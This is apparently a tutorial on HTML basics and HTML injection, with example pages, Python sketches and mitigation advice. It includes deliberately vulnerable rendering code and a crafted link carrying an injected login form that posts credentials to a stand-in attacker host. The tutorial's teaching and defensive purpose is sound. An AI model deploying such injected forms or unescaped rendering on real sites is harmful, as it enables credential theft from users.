HTML is considered the skeleton of every web application, as it defines the structure and layout of the hosted content. In this article, we will learn how improperly handled HTML opens the gates for attackers to manipulate the designed webpages and steal sensitive data from users.
What is HTML?
HTML is an abbreviation of “Hyper Text Markup Language”, which is the basic building block of a website. It determines the structure of the webpages in a web application. The “Hyper Text” part refers to text that links to other text through hyperlinks, and the “Markup” part refers to the elements that wrap the data items to be displayed in the browser.
What are these elements?
- An element is the basic unit of an HTML page. It consists of an opening tag, a closing tag, and the text content in between, for example:
<h1>HTML Injection</h1>
HTML Tag:
An HTML tag labels a piece of content as a ‘heading’, ‘paragraph’, or ‘form’, to name a few. Tags are the names of elements surrounded by angle brackets, and they come in two types: the “start tag”, also known as the opening tag, and the “end tag”, also known as the closing tag. Browsers do not display these HTML tags but use them to interpret and render the content of the webpage.
HTML Attributes:
To provide extra information about an element, we use attributes. They reside inside the start tag and come in “name/value” pairs: the attribute name is followed by an “equal-to sign”, and the attribute value is enclosed in “quotation marks”.
<a href="http://hacker.in">Hack</a>
Here, “href” is the “attribute name” and http://hacker.in is the “attribute value”.
Now that we are aware of the basic HTML terminology, let us check out the “HTML element flowchart” and try implementing it all by creating a simple webpage.
Basic HTML Page:
Every web page on the internet is, in one way or another, an HTML file. These files are nothing but plain-text files with the “.html” extension that are saved and then opened in a web browser.
So, let us try to create a simple web page in Notepad and save it as hacker.html:
<html>
<head>
<title> World of Hacker</title>
</head>
<body bgcolor="green">
<br>
<center><h2>WELCOME TO <a href="http://hacker.in">WORLD OF HACKER</a></h2>
<br>
<p>Author “Test Admin”</p>
</center>
</body>
</html>
Let us open this “hacker.html” file in our browser and see what we have developed.
We have successfully designed our first web page. Now let us learn how these tags work.
- The <html> element is the root element of every HTML Page.
- The <head> element contains meta-information about the document.
- The <title> element specifies a title for the webpage.
- The <body> element contains the visible page content. Here it has the “bgcolor” attribute set to “green”.
- The <br> element defines a line break, so the content that follows starts on the next line.
- The <h2> element defines a second-level heading (<h1> defines the largest heading).
- The <p> element defines a paragraph.
- The <a> element defines an anchor, which lets us set up a “hyperlink”.
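As a side illustration, the following Python sketch feeds a copy of the page to the standard library's html.parser module and prints every start tag together with its attributes, which is roughly how a browser's parser sees the tags and name/value pairs described above. The class name TagLister and the helper list_tags are made up for this example, and the page text is a cleaned-up copy of hacker.html.

```python
from html.parser import HTMLParser

# A cleaned-up copy of the hacker.html page (assumption: straight quotes, fixed typos).
PAGE = """<html>
<head>
<title>World of Hacker</title>
</head>
<body bgcolor="green">
<br>
<center><h2>WELCOME TO <a href="http://hacker.in">WORLD OF HACKER</a></h2>
<br>
<p>Author "Test Admin"</p>
</center>
</body>
</html>"""


class TagLister(HTMLParser):
    """Collects a (tag, attributes) pair for every start tag encountered."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        # The parser lowercases tag names; attrs is a list of (name, value) tuples.
        self.seen.append((tag, dict(attrs)))


def list_tags(markup):
    """Parse markup and return the start tags in document order."""
    parser = TagLister()
    parser.feed(markup)
    parser.close()
    return parser.seen


for tag, attrs in list_tags(PAGE):
    print(tag, attrs)
```

Only <body> and <a> carry attributes in this page, so they are the only entries printed with a non-empty dictionary.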
By now, you should be clear about what HTML is, what it is mainly used for, and how all of this can be implemented.
Now let us try to find out the major loopholes and learn how attackers inject arbitrary HTML code into vulnerable web pages to modify the hosted content.
Introduction to HTML Injection:
HTML Injection, which is also termed “virtual defacement”, is one of the simplest and most common vulnerabilities. It arises when a web page fails to sanitize user-supplied input or to encode its output. This allows an attacker to inject malicious HTML code into the application through the vulnerable field, so that he can modify the content of the webpage and even steal sensitive data.
Let us take a look at this scenario and learn how such HTML Injection attacks are executed:
Consider a web application that suffers from an HTML injection vulnerability because it does not validate user input. In such a scenario, if the attacker finds the weakness, he may inject a malicious “HTML login form” with a lure of “Free movie tickets” to trick the victim into submitting his sensitive credentials.
Now, as the victim browses the webpage, he is lured by the “Free movie tickets” offer. When he clicks the link, he is redirected to what looks like the application’s login screen, which is nothing but the attacker’s crafted “HTML form”. Once the victim enters his credentials, the attacker captures them on his listener machine, which leads to a data breach or data compromise.
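To make the scenario concrete, here is a minimal Python sketch of the kind of flaw described above. It assumes a hypothetical page that greets the visitor by name. The function render_greeting and the attacker.example address are invented for illustration and do not come from any real application.

```python
def render_greeting(name):
    """Build a greeting page from user input.

    VULNERABLE on purpose: the input is concatenated into the markup unchanged,
    so any tags it contains become part of the page.
    """
    return "<html><body><p>Hello, " + name + "!</p></body></html>"


# Ordinary input produces the page the developer intended.
benign = render_greeting("Alice")

# Input that contains markup is rendered as markup, not as text.
injected = render_greeting(
    '<a href="http://attacker.example/login">Free movie tickets</a>'
)

print(benign)
print(injected)
```

In the second page, the browser would show a clickable “Free movie tickets” link that the developer never wrote, which is exactly the lure used in the scenario.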
Impact of HTML Injection:
- It can allow an attacker to modify the page.
- It can allow an attacker to steal another person’s identity.
A typical attack proceeds as follows:
- The attacker discovers an injection vulnerability and decides to use an HTML injection attack.
- The attacker crafts a malicious link that includes his injected HTML content and sends it to a user via email.
- The user visits the page because it is located within a trusted domain.
- The attacker’s injected HTML is rendered and presented to the user asking for a username and password.
- The user enters a username and password, which are both sent to the attacker’s server.
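The link-crafting step in the list above can be sketched in Python as follows. This is only an illustration under stated assumptions: the site trusted.example, its “q” parameter, the attacker.example address, and the helpers build_link and read_param are all hypothetical. The point is that the injected markup travels percent-encoded inside an ordinary-looking URL on the trusted domain and is decoded back to raw HTML on the server side.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical injected markup: a form that posts to a server the attacker controls.
PAYLOAD = (
    '<form action="http://attacker.example/collect" method="post">'
    'Username: <input name="user"> Password: <input type="password" name="pass">'
    '<input type="submit" value="Log in"></form>'
)


def build_link(base_url, param, value):
    """Return base_url with value percent-encoded into the query string."""
    return base_url + "?" + urlencode({param: value})


def read_param(url, param):
    """Decode a query parameter, as server-side code typically does before using it."""
    return parse_qs(urlsplit(url).query)[param][0]


link = build_link("http://trusted.example/search", "q", PAYLOAD)
print(link)

# The decoded value is the original markup again. If the page echoes it without
# encoding, the form is rendered inside the trusted site.
print(read_param(link, "q") == PAYLOAD)
```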
Mitigation of HTML injection:
HTML injection is mainly the result of missing validation of input and output, which usually comes down to developer oversight or lack of awareness. It is therefore essential to have appropriate data validation in place to prevent such attacks.
- Every input should be checked for script code or HTML code. In particular, check whether it contains script or HTML tags in angle brackets, such as <script></script> or <html></html>.
- Most programming languages provide functions for detecting or escaping these special characters. Which function to choose depends on the programming language that you are using.
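In Python, for instance, the standard library function html.escape is one such function. The sketch below is a minimal illustration rather than a complete defense: render_greeting_safe and contains_markup are hypothetical helpers written for this example, and real applications usually rely on the automatic escaping of their template engine.

```python
import html


def contains_markup(value):
    """Rough check for angle brackets, useful for rejecting or logging suspicious input."""
    return "<" in value or ">" in value


def render_greeting_safe(name):
    """Build a greeting page with the user input encoded as text.

    html.escape replaces &, < and > with entities, and with the default
    quote=True it also replaces double and single quotes.
    """
    return "<html><body><p>Hello, " + html.escape(name) + "!</p></body></html>"


user_input = '<a href="http://attacker.example/login">Free movie tickets</a>'

print(contains_markup(user_input))
print(render_greeting_safe(user_input))
```

After escaping, the browser displays the injected tags as literal text instead of rendering a link. Encoding on output in this way is generally more dependable than trying to filter specific tags out of the input.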